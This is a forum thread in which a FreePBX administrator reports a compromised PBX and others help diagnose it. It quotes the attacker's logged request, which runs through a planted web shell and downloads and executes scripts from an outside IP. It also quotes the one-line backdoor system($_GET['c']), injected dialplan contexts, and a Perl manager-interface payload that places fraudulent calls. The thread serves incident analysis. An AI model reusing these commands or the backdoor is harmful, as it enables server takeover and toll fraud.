Possible security exploit in /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php

Hi,

This is my first post here so be gentle

I just wondered if anyone had seen this issue before. Over the weekend we received a warning from out SIP provider that we were routing unusual numbers of calls through our freepbx box (Asterisk 11.12.0 / FreePBX 2.11.0.38).

I checked the asterisk logs and sure enough there were calls that shouldn’t be there. Interestingly they all started with:

Executing [007xxxxxxxxxx@doclickoutcontextnow7:1] NoOp(“Local/xxxxxx@doclickincontextnow7-00000019;1”, ““Click Out Context””) in new stack

Which was odd because I’d never come across the context ‘doclickoutcontextnow7’ in my configuration - but sure enough when I checked:

[doclickoutcontextnow7]
exten => _X.,1,NoOp(“Click Out Context”)
exten => _X.,n,Goto(from-internal,${EXTEN},1)
[doclickincontextnow7]
exten => _X.,1,NoOp(“Click in Context”)
exten => _X.,n,Answer(999999999999999999)
exten => _X.,n,Wait(999999999999999999)

had been added to the bottom of my extensions.conf. My first though was ‘ahh - I’ve been hit by shellshocked’ - my second was ‘well if I have it must have been through the web interface’ so I checked the httpd logs and found:

xxx.xxx.xxx.xxx - - [27/Sep/2014:17:08:35 +0100] “GET /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget±O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk±rx+‘dialplan+reload’;/usr/sbin/asterisk±rx+‘manager+reload’;wget±O+/tmp/c2.pl+http://94.102.49.82/c.pl; HTTP/1.1” 200 22 “-” “-”

so checked my /tmp folder and found a c.sh script which was set up to modify extensions.conf accordingly as well as c2.pl which appears to make a connection to the manager interface of asterisk and initial calls between 2 given numbers with the following code:

$payload = “Action: Login\r\n”
.“Username: $user\r\n”
.“Secret: $password\r\n\r\n”
.“Action: Originate\r\n”
.“Channel: Local/$phone@doclickincontextnow7\r\n”
.“Context: doclickoutcontextnow7\r\n”
.“Exten: $number\r\n”
.“Priority: 1\r\n”;
$payload .= “Async: yes\r\n”;
$payload .= “Callerid: $phone\r\n\r\n”
.“Action: Logoff\r\n\r\n”;

I removed these files then visited the URL:

http:// ip of my freepbx/admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=wget±O+/tmp/c.sh+http://94.102.49.82/c2.sh;chmod+a%2bx+/tmp/c.sh;/tmp/c.sh+add;/usr/sbin/asterisk±rx+%27dialplan+reload%27;/usr/sbin/asterisk±rx+%27manager+reload%27;wget±O+/tmp/c2.pl+http://94.102.49.82/c.pl;

In my web browser and the exploit reinstalled itself. I’ve applied all the updates for centos and all the module updates for freepbx and the above link still installs the exploit even when I’m not logged into the web interface as an administrator.

I wondered whether

a) anyone else had seen this before

and

b) is this actually an exploit in common_admin_functions.php that should be fixed.

Now I’m pretty sure this isn’t a shellshocked exploit but I guess the moral of the story is not to leave your freepbx box admin interface open to the internet - especially on port 80 so I am no longer doing so but I’d be interested on peoples feedback.

Regards

Mat

Of course - the more I dig into it the more I am realising that common_admin_functions.php isn’t a standard part of the freepbx web interface - but has ‘appeared’ since the box has been installed and infact on one of my other freepbx boxes I don’t even have an admindashboard folder but only have one called dashboard.

On this compromised box when I list modules I have a ‘System Admin Dashboard’ module installed alongside the ‘System Dashboard’ one - which I don’t have on my other boxes.

Does anyone have any idea if this is a valid module ? or has it been installed maliciously and is the cause of my other issues ?

the common_admin_functions.php script within it is obviously designed for exploits as it only contains the command:

system($_GET[“c”]);

Mat

This is not a FreePBX maintained module. The rawname “admindashboard” is not in our internal database, never has been. I searched google and github and didnt find it. you can look at
/var/www/html/admin/modules/admindashboard/module.xml and see if there is author info

no sane person would ever

system($_GET["c"]);

This should be of interest: http://whatismyipaddress.com/ip/94.102.49.82

Hi Wardmundy

Yes, I already took a look at the IP address but I suspect it just leads to another compromised machine.

Mat

Hi jfinstrom

The module.xml file doesn’t really tell me an awful lot:

<module>
<rawname>admindashboard</rawname>
<repo>standard</repo>
<name>System Admin Dashboard</name>
<version>2.11.0.2</version>
<publisher>FreePBX</publisher>
<license>GPLv2+</license>
<candisable>no</candisable>
<canuninstall>no</canuninstall>
<category>Reports</category>
<description>
Provides a system information dashboard, showing information about Calls, CPU, Memory, Disks, Network, and processes.
</description>
<menuitems>
<dashboard display=“index” access=“all”>FreePBX System Status</dashboard>
</menuitems>
<depends>
<version>2.3.0beta2</version>
</depends>
<changelog>
2.11.0.2 Fixes #6514 Check if is_int or ctype_digit
2.11.0.1 fix to ajax path for alt labels
2.11.0.0 bump to 2.11
2.10.0.3 #5292, #5145
2.10.0.2 #5478
2.10.0.1 remove FOP specific code
2.10.0.0 new version changes
</changelog>
<location>release/2.11/dashboard-2.11.0.2.tgz</location>
<md5sum>291999a3523f5ed531083f54a9144463</md5sum>
<supported><version>2.11</version></supported></module>

What I’m trying to understand is how the module got there. The system has only been installed for 3 weeks and has been behind a NAT firewall. The only ports that have been open to the box are port 80 (the admin password for the user interface is set to something fairly obscure) and port 22 (ssh) to which access is very strictly limited via TCP wrappers and has PermitRootLogins disabled.

Thanks for you input so far, but I think I may just chalk this up to experience and make sure no to leave port 80 open in the future.

Cheers

Mat

obviously by saying the modules.xml file doesn’t tell me an awful lot I mean that I realise it’s just a modified version of the standard System Dashboard

Hi,

Guys, we’ve got exactly the same hack. I just reported it and we’re discussing.

So it might have been a common bug somewhere. Btw, our client was hacked on Sep 21.

You guys all need to identify exactly how you installed FreePBX, by recipe or by “distro”, and if you added ANY software to your box. This will be necessary to isolate where the vulnerability is.

Yes, very strange situation. As far as i remember, we didn’t install anything. I’ll try to find any info.

Yes, but how did you install FreePBX? there are numerous ways to achieve that.

As far as i remember, it was an ISO from official site, nothing more. That was a fresh install on dedicated server for client.